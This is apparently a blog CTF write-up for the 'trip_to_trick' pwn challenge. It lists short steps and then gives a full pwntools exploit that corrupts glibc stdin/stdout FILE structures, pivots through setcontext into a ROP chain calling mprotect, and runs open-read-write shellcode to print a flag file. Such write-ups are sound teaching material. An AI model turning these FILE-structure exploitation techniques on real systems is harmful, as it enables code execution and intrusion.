1. stdin._IO_buf_base -> stdin
2. stdin._IO_buf_base = stdout, stdin._IO_buf_end = stdout +0x2000
3. stdout.vtable = _IO_helper_table
4. _IO_helper_table.sysclose = setcontext + 53
5. rop + orw
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from pwn import * | |
if len(sys.argv) != 2: | |
print "sys.argv[1] = r : remote l : local" | |
exit() | |
#context.log_level = 'debug' | |
if sys.argv[1].strip() == 'l': | |
p = process('./trip_to_trick') | |
elif sys.argv[1].strip() == 'r': | |
p = remote('',) | |
e = ELF('./trip_to_trick') | |
if sys.argv[1].strip() == 'l': | |
l = e.libc | |
elif sys.argv[1].strip() == 'r': | |
l = ELF('./') | |
pause() | |
p.recvuntil("0x") | |
libc = int(p.recv(12), 16) - l.sym['system'] | |
log.info("libc : " + hex(libc)) | |
prdi = libc + 0x0000000000026542 | |
prsi = libc + 0x0000000000026f9e | |
prdx = libc + 0x000000000012bda6 | |
stdin = libc + l.sym['_IO_2_1_stdin_'] | |
stdout = libc + l.sym['_IO_2_1_stdout_'] | |
helper = libc + 0x1e5960 | |
log.info("stdout : " + hex(stdout)) | |
pay = hex(stdin + 0x38)[2:] + " " + hex(stdin)[2:] | |
p.sendline(pay) # _IO_2_1_stdin_ -> _IO_buf_base = _IO_2_1_stdin_ | |
pay = p64(0xfbad208b) | |
pay += p64(stdout + 0xd8) | |
pay += p64(stdout) * 6 | |
pay += p64(stdout + 0x2000) | |
p.send(pay) | |
pay = p64(0xfbad2887) #stdout | |
pay += p64(0x00007f21110c47e3 - 0x00007f2110edf000 + libc) * 7 | |
pay += p64(0x00007f21110c47e4 - 0x00007f2110edf000 + libc) | |
pay += p64(0) * 4 | |
pay += p64(0x00007f21110c3a00 - 0x00007f2110edf000 + libc) | |
pay += p64(1) | |
pay += p64(0xffffffffffffffff) | |
pay += p64(0) | |
pay += p64(0x00007f21110c6580 - 0x00007f2110edf000 + libc) | |
pay += p64(0xffffffffffffffff) | |
pay += p64(0) | |
pay += p64(0x00007f21110c38c0 - 0x00007f2110edf000 + libc) | |
pay += p64(0) * 3 | |
pay += p64(0x00000000ffffffff) | |
pay += p64(0) * 2 | |
pay += p64(helper) #stdout end | |
log.info("HELPER : " + hex(helper)) | |
pay += p64(libc + l.sym['_IO_2_1_stderr_']) | |
pay += p64(stdout) | |
pay += p64(stdin) | |
#pay += p64(0x00007f92dbab0e90 - 0x7f92dba8a000 + libc) | |
# rop payload | |
rop = p64(prdi) | |
rop += p64(helper &~0xfff) | |
rop += p64(prsi) | |
rop += p64(0x3000) | |
rop += p64(prdx) | |
rop += p64(7) | |
rop += p64(libc + l.sym['mprotect']) | |
# shellcode | |
context(arch = "amd64", os = "linux") | |
orw = shellcraft.pushstr("/root/pwn/flag") | |
orw += shellcraft.open('rsp', 0, 0) | |
orw += shellcraft.read('rax', 'rsp', 0x100) | |
orw += shellcraft.write(1, 'rsp', 0x100) | |
orw = asm(orw).center(0x50, '\x90') | |
pay += orw.ljust(0x108, '\x90') | |
pay += p64(libc + l.sym['setcontext'] + 53) * 20 | |
pay += p64(stdout + len(pay)) | |
pay += rop | |
pay += p64(libc + 0x1e5858) | |
p.send(pay) | |
p.interactive() |
'CTF write-up' 카테고리의 다른 글
[TRUST-CTF 2020] Fast Restaurant 출제자 writeup (0) | 2020.02.25 |
---|---|
[Hitcon 2016] Secret Holder (0) | 2020.01.25 |
[wargame.0x0.site] babyheap 라이트업 (0) | 2019.10.12 |
Tokyo Western CTF 2017 - Parrot (0) | 2019.10.02 |
[hackingcamp2019]bonus (0) | 2019.08.25 |